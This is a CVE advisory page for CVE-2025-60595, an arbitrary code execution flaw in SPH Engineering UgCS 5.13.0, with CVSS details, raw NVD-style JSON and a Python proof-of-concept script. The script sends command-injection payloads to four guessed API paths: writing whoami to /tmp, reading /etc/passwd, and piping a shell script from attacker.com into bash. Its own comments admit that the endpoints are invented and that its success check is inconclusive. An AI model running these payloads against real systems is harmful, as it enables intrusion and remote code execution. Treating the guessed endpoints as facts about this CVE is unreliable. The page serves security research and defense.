Security Vulnerability Report
CVE-2025-60595 CVSS 8.2 HIGH

CVE-2025-60595

Published: 2025-10-29 17:15:36
Last Modified: 2026-04-15 00:35:42

Description

SPH Engineering UgCS 5.13.0 is vulnerable to arbitrary code execution.

CVSS Details

CVSS Score
8.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N

Configurations (Affected Products)

No configuration data available.

SPH Engineering UgCS 5.13.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-60595 PoC - UgCS 5.13.0 Arbitrary Code Execution

Note: This is a conceptual demonstration for security research only.
Do not use against systems without authorization.

Reading notes for anyone triaging this script:

* The published CVE description names no endpoint, parameter or root cause.
  The request paths and the JSON body below are the script author's generic
  guesses, not details taken from the advisory.
* The success test is a heuristic (HTTP 200 plus a JSON key named "result"
  or "output"). It does not observe command execution, so both a True and a
  False return are inconclusive.
* The body is not a read-only probe: each string in "commands" has a side
  effect if a server ever hands it to a shell.
"""
import requests
import json

TARGET_HOST = "http://target-ugcs-server.com"
CVE_ID = "CVE-2025-60595"


def check_vulnerability(target):
    """POST one fixed JSON body to four guessed paths under *target*.

    Returns True at the first path that answers HTTP 200 with a JSON body
    containing a "result" or "output" key; returns False once every path has
    been tried without such an answer. Request errors are printed and the
    loop moves on to the next path.
    """
    # Labelled "common UgCS endpoints" by the original author; nothing in the
    # CVE description confirms that any of these paths exists or is affected.
    candidate_paths = [
        "/api/v1/task/upload",
        "/api/config/import",
        "/api/mission/parse",
        "/api/vehicle/connect"
    ]

    # Generic shell-metacharacter strings (`;`, `|`, `$(...)`), not a payload
    # specific to this CVE. For defenders, the same metacharacters appearing
    # in JSON string fields of requests to a UgCS host are the pattern to
    # look for in proxy or application logs.
    probe_body = {
        "task_name": "Test Mission",
        "commands": [
            "; whoami > /tmp/pwned.txt #",
            "| cat /etc/passwd #",
            "$(curl http://attacker.com/shell.sh|bash)"
        ],
        "metadata": {
            "version": "5.13.0",
            "cve": CVE_ID
        }
    }

    print(f"[*] Testing {CVE_ID} on {target}")

    for full_url in (target + path for path in candidate_paths):
        try:
            resp = requests.post(full_url, json=probe_body, timeout=10)
            print(f"[+] Sent payload to {full_url} - Status: {resp.status_code}")

            if resp.status_code != 200:
                continue

            # NOTE(review): resp.json() raises on a body that is labelled JSON
            # but does not parse; older requests releases raise a plain
            # ValueError there, which the except clause below does not catch.
            looks_like_json = 'json' in resp.headers.get('content-type', '')
            parsed = resp.json() if looks_like_json else {}

            # Key presence only: an ordinary API reply that happens to carry
            # one of these keys is reported as a hit (false positive), and an
            # injection that returns no output is missed (false negative).
            if 'result' not in parsed and 'output' not in parsed:
                continue

            print(f"[!] Potential vulnerability confirmed at {full_url}")
            print(f"[*] Response: {json.dumps(parsed, indent=2)}")
            return True

        except requests.exceptions.RequestException as exc:
            print(f"[-] Error accessing {full_url}: {exc}")

    print("[*] Vulnerability check completed")
    return False


if __name__ == "__main__":
    import sys

    cli_args = sys.argv[1:]
    if not cli_args:
        print(f"Usage: python3 {sys.argv[0]} <target_url>")
        print(f"Example: python3 {sys.argv[0]} {TARGET_HOST}")
    else:
        # The boolean result is discarded; the outcome is only visible in the
        # printed lines.
        check_vulnerability(cli_args[0])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60595", "sourceIdentifier": "[email protected]", "published": "2025-10-29T17:15:36.150", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "SPH Engineering UgCS 5.13.0 is vulnerable to Arbitary code execution."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}]}], "references": [{"url": "https://github.com/Clicksafeae/CVE-2025-60595/tree/main", "source": "[email protected]"}, {"url": "https://www.sphengineering.com", "source": "[email protected]"}]}}